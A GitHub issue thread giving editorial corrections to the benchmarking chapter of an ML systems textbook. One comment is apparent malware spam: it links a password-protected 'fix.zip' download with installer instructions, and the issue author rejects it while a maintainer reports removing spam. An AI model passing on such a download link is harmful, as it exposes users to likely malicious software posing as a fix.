### ISSUE TITLE
Note on first 4 chapter of "benchmarking.qmd"

### ISSUE THREAD

**Issue by BravoBaldo** [harvard-edge/cs249r_book#402]
- The "Baseline" and "Baseline Models" sections start with the same 2 sentences and are too close for that.
- In "11.4.3 Training vs. Inference"
 	Not sure (probably just a translation flaw):
 		"On the other hand, benchmarking inference evaluates"...
 	"benchmarking inference" vs "Inference benchmarking" ? (different places)
- See "** Energy Consumption: **" maybe missing format tags (I suspect spaces in .qmd file)
- In section "Benchmarks" maybe "MLPerf Training Benchmark" is differently formatted compared to previous "DAWNBench" and "Fathom"
- Search "if a model takes less time to predict,".... maybe opposite!
- In section "11.4.5 Inference Benchmarks"... sub-sec. "Metrics" points 5 and 6 are doubled "Energy Efficiency: "
- Search "OpenVINO toolkit provides a benchmark tool" ... The whole paragraph is duplicated

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by BravoBaldo** [comment]
...of course NOT !!!

**Comment by profvjreddi** [comment]
I deleted likely spam-related comments to keep things clean.
